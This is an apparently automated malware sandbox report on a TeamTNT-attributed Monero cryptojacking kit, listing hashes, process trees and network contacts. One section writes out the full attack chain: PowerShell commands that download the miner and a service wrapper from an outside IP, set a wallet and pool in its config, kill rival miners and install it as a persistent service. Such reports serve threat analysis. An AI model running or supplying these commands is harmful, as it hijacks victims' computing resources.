SHA512 2e26fdd7778c15df72c36c9718015d82c6d5c62232f5ea41c11ebf846f84cdc4d48c8c1bce16a76eca995e9c441a7442523b12f794f54f813f347e07beb3be43

C:\Users\Admin\moneroocean\config.json

MD5 2a7d154f3f4a62932f80ea0d62776fb1
SHA1 d8bc14b26073d8da26b3801d5f118c1c2fb9e916
SHA256 8c5e3471399b12cd08552ca3608ef57ebfa6da170d82b6d4ee5c95ed06b902d8
SHA512 64e50e4e45b1ffcd1f0655816541c55440376c87302ad468ec9111d409d0cb0a5ace31fb9ac90e881694eba7906e19175d23a336b2deb3c881555e4940390c23

memory/2640-261-0x0000000000000000-mapping.dmp

memory/2684-268-0x0000024634AB6000-0x0000024634AB8000-memory.dmp

memory/2640-269-0x000002CC7A890000-0x000002CC7A892000-memory.dmp

memory/2640-270-0x000002CC7A893000-0x000002CC7A895000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 1bcb465bafde8c1434b1561ced728749
SHA1 6f08eb9d57100b4876d7346d744fffe928ad6648
SHA256 1db46b71c87b1e38dfd7af6d4dc1003122e1e78f2a24863349419ffdf602e034
SHA512 773ec8962dc5563351acf67a8e2787ec56dbdbc96c62cebb9cb6fb6319ef62614fe0a3823aa02e82f1b46ed3b8d07e6efdf3eb19df05e22397b7ca552a2fcdfc

C:\Users\Admin\moneroocean\config.json

MD5 031168b8b85aa1ff67dbe665e3ea9fd1
SHA1 aa617eab33ad5d776a96bc79ad2c88205ff315b4
SHA256 d021106b60e81826150b4f5e50969cc66c3781c20faab66b8e795ebf938e7b6f
SHA512 32d88ac902f0bfc12085c9d77919c2f31d9bcf574cafe5a82f484c4a5e7c3c5676fa7fc3ffb2687c22b183f59ca80a8d178a3651328bf32a2c6e124bd09c1c0d

memory/3472-287-0x0000000000000000-mapping.dmp

memory/2640-294-0x000002CC7A896000-0x000002CC7A898000-memory.dmp

memory/3472-295-0x0000024BF8280000-0x0000024BF8282000-memory.dmp

memory/3472-296-0x0000024BF8283000-0x0000024BF8285000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 9a829f9f5ded3f9a1ec326f6a6cab345
SHA1 738e6ce9004d7463811ae2ac8000c701736386ba
SHA256 5348f58a41191272bb3416915d5cd0ef7e8d7333f9c499541439daac6e3a9f31
SHA512 88740d927926c36df4f81f9637bcf45f709330fb27b34bac50838ddc28f8e1a95de88c3c7bba66f360727fa337fa3e53c71c0cfed1cf830e6e65b4d27bed8563

C:\Users\Admin\moneroocean\config.json

MD5 115d22c264f7912e7d02307386db8c53
SHA1 fe96e575df30c6c3b4f1c3a331d6641f7061726e
SHA256 38b5c830e728ac133ac5f8153f48f0e90c74dfdbde73426de2331dde69300c9a
SHA512 0390fd713b7a413eff753f9ab5e3779cf3c0a59b0dbd701e58bae5be222c3ae846dc0605c4802a1851e1e3f371c0baf28560b5bbf98a4131857ee1e0fb864bd8

memory/1688-313-0x0000000000000000-mapping.dmp

memory/1688-321-0x0000015D7E9D0000-0x0000015D7E9D2000-memory.dmp

memory/3472-319-0x0000024BF8286000-0x0000024BF8288000-memory.dmp

memory/1688-322-0x0000015D7E9D3000-0x0000015D7E9D5000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6ca7324beb2215be243500bc82290706
SHA1 1108f05689bda703ebe065f6dfe9f7bf551b2642
SHA256 307f464ddd8139dc577c3cd42248c146c86004f83c215f324e634852311819e5
SHA512 e15a169632ed6b8745c02af105316acce972c8e9eec1a228492562ba7424e0948692979f7f28b7b536a73a7698c15268c6c260eedd6ea423f757ef1febaeb9d3

C:\Users\Admin\moneroocean\config.json

MD5 c35b704c05e2018ce71f35b4be6d687b
SHA1 7771d19d56d23d3d6f38df5c33a2f162c2b07493
SHA256 53b163495576feeb58a418e067016223e9bcfaec0e3e2b0a7d6636c5c23b51d7
SHA512 7ecfb37d3bf84959b923f9123053456db74016afc36ce29a6a55b5a6e6fe1d6abeff71724d61b1a499f97842fd711c6e2eaa3e7b885541fd3233aff2d2a24191

memory/2512-339-0x0000000000000000-mapping.dmp

memory/1688-343-0x0000015D7E9D6000-0x0000015D7E9D8000-memory.dmp

memory/2512-345-0x000001B2C0BC3000-0x000001B2C0BC5000-memory.dmp

memory/2512-347-0x000001B2C0BC0000-0x000001B2C0BC2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 8c2b856bb67d0c963bae3a55dabb0c72
SHA1 b17fe6260d16fe6f764c026974d038c703da767d
SHA256 dc9036fd9085a78a911ecd50f441acb6cc2a2f57f3f87cf434da3915dbe4f820
SHA512 c102956e405cba3b8bb9750705f19490414012b1a1178344971378c3bc4c64fb933261a43a557d2b0ecc0c2219daed3ac34fa939eeff5ba87b30b30a5f5efd52

C:\Users\Admin\moneroocean\config.json

MD5 bc60290fa5050425ae4a655f493802aa
SHA1 42df7d9c1e95a7e86c4652b7688d5ea5f03e2c47
SHA256 6d2d16f7f250d2db6686c1db275145944cfefef2bdee67bb263f815e10ca3409
SHA512 6eda5175e9dc409ee2ae09a5050d08cb910395ecbb81262fdfcc42adcdb078febabf40b4dab679d003aaf625f1645f616c56e4926d6ff331f797f5c368bab5f7

C:\Users\Admin\moneroocean\config.json

MD5 05193fd0a7804c0389d4043816400804
SHA1 9dfab5b729c059a690169de942919137643162ff
SHA256 6ec2240148b44dddc36db5b78aa92636c541940dd0e7ebfdbf209493fc1a2f52
SHA512 cc7af49aa14fd743c1a927160541934549d508e5042a8b6347986b91dee646fa61ce50b3cc16434bd628b8d005c1936ec9abe46c3370f5f9d9c0f240a3c9b997

memory/3184-366-0x0000000000000000-mapping.dmp

memory/2512-373-0x000001B2C0BC6000-0x000001B2C0BC8000-memory.dmp

memory/3184-374-0x000002B34BEB0000-0x000002B34BEB2000-memory.dmp

memory/3184-375-0x000002B34BEB3000-0x000002B34BEB5000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 33ce3bd4c52bd058a32997d140983eb9
SHA1 463dbf2a6a11f4f8d51ac7aadc6f03047e65f4f6
SHA256 bf3647a6aac8b0ca4da842b7825b004c7d01ba7db097abfc2f842568bdba8b8f
SHA512 38c82103ed33c7ccf6a1773eb36d5838b0b5e7d6289d3a3a69aec2f1b9170f2658399a64fd1d32fb968eb2285ce0f2cc2e9837a940eed6f5ecf7187653ed1539

C:\Users\Admin\moneroocean\config_background.json

MD5 05193fd0a7804c0389d4043816400804
SHA1 9dfab5b729c059a690169de942919137643162ff
SHA256 6ec2240148b44dddc36db5b78aa92636c541940dd0e7ebfdbf209493fc1a2f52
SHA512 cc7af49aa14fd743c1a927160541934549d508e5042a8b6347986b91dee646fa61ce50b3cc16434bd628b8d005c1936ec9abe46c3370f5f9d9c0f240a3c9b997

memory/3288-391-0x0000000000000000-mapping.dmp

memory/816-392-0x0000000000000000-mapping.dmp

memory/3184-393-0x000002B34BEB6000-0x000002B34BEB8000-memory.dmp

memory/3416-394-0x0000000000000000-mapping.dmp

C:\Users\Admin\moneroocean\xmrig.exe

MD5 90ba713a657fe704ca05fbcfd967c245
SHA1 020c59739d08b12008554ec48af07ec35d12f178
SHA256 5ba3e2db02b76821bae00056323810032c0ebc1c54b1c93f383e31b3526ee847
SHA512 98c88ffc0909f2bf76c78b46826e2a786f7fe3872f824c7c9e7959987cd5d7b46328b01b526f4431aa047685d5c88fa5172d819d58eed4a457b70e0de023c8d3

C:\Users\Admin\moneroocean\config_background.json

MD5 8b89a341da7415528c151ae4ab3d851c
SHA1 2b28ff8a983351ab6c73c61bb6e96135fb9368d2
SHA256 c5cbb3a890dd0ac355a4b2928d7dfc0448b53800682401457b1144b77d5339f0
SHA512 1319cd72fbc51c80a5df03ed7f67f737b1acf59eaae195cde72e5d7d33f93c044c65800467e8e10021ab1881df0e22d6d2ca9661fa51f536d09f8f943d6c96e5

memory/3416-398-0x00000000001B0000-0x00000000001B4000-memory.dmp

Analysis: behavioral29

Detonation Overview

Submitted

2021-10-29 19:08

Reported

2021-10-29 19:57

Platform

ubuntu1804-amd64-en-20211025

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

N/A

Files

N/A

Analysis: behavioral31

Detonation Overview

Submitted

2021-10-29 19:08

Reported

2021-10-29 19:59

Platform

win10-en-20210920

Max time kernel

110s

Max time network

126s

Command Line

"C:\Users\Admin\AppData\Local\Temp\nssm.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\nssm.exe

"C:\Users\Admin\AppData\Local\Temp\nssm.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 time.windows.com udp
NL 20.101.57.9:123 time.windows.com udp

Files

N/A

Analysis: behavioral18

Detonation Overview

Submitted

2021-10-29 19:08

Reported

2021-10-29 19:57

Platform

win10-en-20211014

Max time kernel

12s

Max time network

17s

Command Line

"C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\rig_win64\xmrig-6.13.1\WinRing0x64.sys.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\rig_win64\xmrig-6.13.1\WinRing0x64.sys.exe

"C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\rig_win64\xmrig-6.13.1\WinRing0x64.sys.exe"

Network

Files

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2021-10-29 19:08

Reported

2021-10-29 19:57

Platform

ubuntu1804-amd64-en-20211025

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

N/A

Files

N/A

Analysis: behavioral14

Detonation Overview

Submitted

2021-10-29 19:08

Reported

2021-10-29 20:00

Platform

win10-en-20211014

Max time kernel

121s

Max time network

146s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\init2.bat"

Signatures

xmrig

miner xmrig

XMRig Miner Payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Stops running service(s)

evasion

Launches sc.exe

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2720 wrote to memory of 3800 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 2720 wrote to memory of 3800 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 3800 wrote to memory of 3956 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3800 wrote to memory of 3956 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2720 wrote to memory of 3024 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\where.exe
PID 2720 wrote to memory of 3024 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\where.exe
PID 2720 wrote to memory of 3436 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\where.exe
PID 2720 wrote to memory of 3436 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\where.exe
PID 2720 wrote to memory of 1868 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\where.exe
PID 2720 wrote to memory of 1868 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\where.exe
PID 2720 wrote to memory of 500 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\where.exe
PID 2720 wrote to memory of 500 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\where.exe
PID 2720 wrote to memory of 1168 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\where.exe
PID 2720 wrote to memory of 1168 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\where.exe
PID 2720 wrote to memory of 416 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2720 wrote to memory of 416 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2720 wrote to memory of 2032 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\sc.exe
PID 2720 wrote to memory of 2032 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\sc.exe
PID 2720 wrote to memory of 2328 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\sc.exe
PID 2720 wrote to memory of 2328 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\sc.exe
PID 2720 wrote to memory of 2968 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2720 wrote to memory of 2968 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\taskkill.exe
PID 2720 wrote to memory of 3460 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2720 wrote to memory of 3460 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 2720 wrote to memory of 3540 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2720 wrote to memory of 3540 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2720 wrote to memory of 3208 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2720 wrote to memory of 3208 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2720 wrote to memory of 1436 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2720 wrote to memory of 1436 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2720 wrote to memory of 2780 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\moneroocean\xmrig.exe
PID 2720 wrote to memory of 2780 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\moneroocean\xmrig.exe
PID 2720 wrote to memory of 3064 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2720 wrote to memory of 3064 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3064 wrote to memory of 3500 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3064 wrote to memory of 3500 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3500 wrote to memory of 3164 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\HOSTNAME.EXE
PID 3500 wrote to memory of 3164 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\HOSTNAME.EXE
PID 2720 wrote to memory of 3040 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2720 wrote to memory of 3040 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2720 wrote to memory of 3924 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2720 wrote to memory of 3924 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2720 wrote to memory of 1012 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2720 wrote to memory of 1012 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2720 wrote to memory of 1600 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2720 wrote to memory of 1600 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2720 wrote to memory of 1200 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2720 wrote to memory of 1200 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2720 wrote to memory of 1424 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2720 wrote to memory of 1424 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2720 wrote to memory of 4016 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2720 wrote to memory of 4016 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2720 wrote to memory of 1272 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2720 wrote to memory of 1272 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2720 wrote to memory of 2936 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\sc.exe
PID 2720 wrote to memory of 2936 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\sc.exe
PID 2720 wrote to memory of 2968 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\sc.exe
PID 2720 wrote to memory of 2968 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\sc.exe
PID 2720 wrote to memory of 1532 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\moneroocean\nssm.exe
PID 2720 wrote to memory of 1532 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\moneroocean\nssm.exe
PID 2720 wrote to memory of 2884 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\moneroocean\nssm.exe
PID 2720 wrote to memory of 2884 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\moneroocean\nssm.exe
PID 2720 wrote to memory of 712 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\moneroocean\nssm.exe
PID 2720 wrote to memory of 712 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\moneroocean\nssm.exe

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\SugarLogic_#teamtnt_by_@r3dbU7z\win\init2.bat"

C:\Windows\system32\net.exe

net session

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 session

C:\Windows\system32\where.exe

where powershell

C:\Windows\system32\where.exe

where find

C:\Windows\system32\where.exe

where findstr

C:\Windows\system32\where.exe

where tasklist

C:\Windows\system32\where.exe

where sc

C:\Windows\system32\timeout.exe

timeout 2

C:\Windows\system32\sc.exe

sc stop moneroocean_miner

C:\Windows\system32\sc.exe

sc delete moneroocean_miner

C:\Windows\system32\taskkill.exe

taskkill /f /t /im xmrig.exe

C:\Windows\system32\timeout.exe

timeout 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Invoke-WebRequest -Uri 'http://85.214.149.236:443/sugarcrm/themes/default/images/SugarLogic/win/xmrig.zip' -OutFile 'C:\Users\Admin\xmrig.zip'"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\xmrig.zip', 'C:\Users\Admin\moneroocean')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"donate-level\": *\d*,', '\"donate-level\": 1,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"

C:\Users\Admin\moneroocean\xmrig.exe

"C:\Users\Admin\moneroocean\xmrig.exe" --help

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"

C:\Windows\system32\HOSTNAME.EXE

"C:\Windows\system32\HOSTNAME.EXE"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"url\": *\".*\",', '\"url\": \"94.130.12.27:3333\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"user\": *\".*\",', '\"user\": \"438ss2gYTKze7kMqrgUagwEjtm993CVHk1uKHUBZGy6yPaZ2WNe5vdDFXGoVvtf7wcbiAUJix3NR9Ph1aq2NqSgyBkVFEtZ\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"pass\": *\".*\",', '\"pass\": \"WinTendo\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"max-cpu-usage\": *\d*,', '\"max-cpu-usage\": 100,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"log-file\": *null,', '\"log-file\": \"C:\\Users\\Admin\\moneroocean\\xmrig.log\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config_background.json' | %{$_ -replace '\"background\": *false,', '\"background\": true,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config_background.json'"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Invoke-WebRequest -Uri 'http://85.214.149.236:443/sugarcrm/themes/default/images/SugarLogic/win/nssm.zip' -OutFile 'C:\Users\Admin\nssm.zip'"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\nssm.zip', 'C:\Users\Admin\moneroocean')"

C:\Windows\system32\sc.exe

sc stop moneroocean_miner

C:\Windows\system32\sc.exe

sc delete moneroocean_miner

C:\Users\Admin\moneroocean\nssm.exe

"C:\Users\Admin\moneroocean\nssm.exe" install moneroocean_miner "C:\Users\Admin\moneroocean\xmrig.exe"

C:\Users\Admin\moneroocean\nssm.exe

"C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppDirectory "C:\Users\Admin\moneroocean"

C:\Users\Admin\moneroocean\nssm.exe

"C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppPriority BELOW_NORMAL_PRIORITY_CLASS

C:\Users\Admin\moneroocean\nssm.exe

"C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStdout "C:\Users\Admin\moneroocean\stdout"

C:\Users\Admin\moneroocean\nssm.exe

"C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStderr "C:\Users\Admin\moneroocean\stderr"

C:\Users\Admin\moneroocean\nssm.exe

"C:\Users\Admin\moneroocean\nssm.exe" start moneroocean_miner

C:\Users\Admin\moneroocean\nssm.exe

C:\Users\Admin\moneroocean\nssm.exe

C:\Users\Admin\moneroocean\xmrig.exe

"C:\Users\Admin\moneroocean\xmrig.exe"

C:\Windows\system32\timeout.exe

timeout 99999

Network

Country Destination Domain Proto
DE 85.214.149.236:443 85.214.149.236 tcp
US 8.8.8.8:53 time.windows.com udp
NL 40.119.148.38:123 time.windows.com udp
DE 85.214.149.236:443 85.214.149.236 tcp

Files

memory/3800-118-0x0000000000000000-mapping.dmp

memory/3956-119-0x0000000000000000-mapping.dmp

memory/3024-120-0x0000000000000000-mapping.dmp

memory/3436-121-0x0000000000000000-mapping.dmp

memory/1868-122-0x0000000000000000-mapping.dmp

memory/500-123-0x0000000000000000-mapping.dmp

memory/1168-124-0x0000000000000000-mapping.dmp

memory/416-125-0x0000000000000000-mapping.dmp

memory/2032-126-0x0000000000000000-mapping.dmp

memory/2328-127-0x0000000000000000-mapping.dmp

memory/2968-128-0x0000000000000000-mapping.dmp

memory/3460-129-0x0000000000000000-mapping.dmp

memory/3540-130-0x0000000000000000-mapping.dmp

memory/3540-131-0x000001B0874C0000-0x000001B0874C2000-memory.dmp

memory/3540-132-0x000001B0874C0000-0x000001B0874C2000-memory.dmp

memory/3540-133-0x000001B0874C0000-0x000001B0874C2000-memory.dmp

memory/3540-134-0x000001B0874C0000-0x000001B0874C2000-memory.dmp

memory/3540-135-0x000001B0874C0000-0x000001B0874C2000-memory.dmp

memory/3540-136-0x000001B088F60000-0x000001B088F61000-memory.dmp

memory/3540-137-0x000001B0874C0000-0x000001B0874C2000-memory.dmp

memory/3540-138-0x000001B0874C0000-0x000001B0874C2000-memory.dmp

memory/3540-139-0x000001B0874C0000-0x000001B0874C2000-memory.dmp

memory/3540-140-0x000001B0A15E0000-0x000001B0A15E1000-memory.dmp

memory/3540-141-0x000001B0874C0000-0x000001B0874C2000-memory.dmp

memory/3540-145-0x000001B0A16A0000-0x000001B0A16A2000-memory.dmp

memory/3540-146-0x000001B0A16A3000-0x000001B0A16A5000-memory.dmp

memory/3540-149-0x000001B0874C0000-0x000001B0874C2000-memory.dmp

memory/3540-150-0x000001B0A16A6000-0x000001B0A16A8000-memory.dmp

memory/3540-151-0x000001B0874C0000-0x000001B0874C2000-memory.dmp

memory/3208-152-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 42d4b1d78e6e092af15c7aef34e5cf45
SHA1 6cf9d0e674430680f67260194d3185667a2bb77b
SHA256 c4089b4313f7b8b74956faa2c4e15b9ffb1d9e5e29ac7e00a20c48b8f7aef5e0
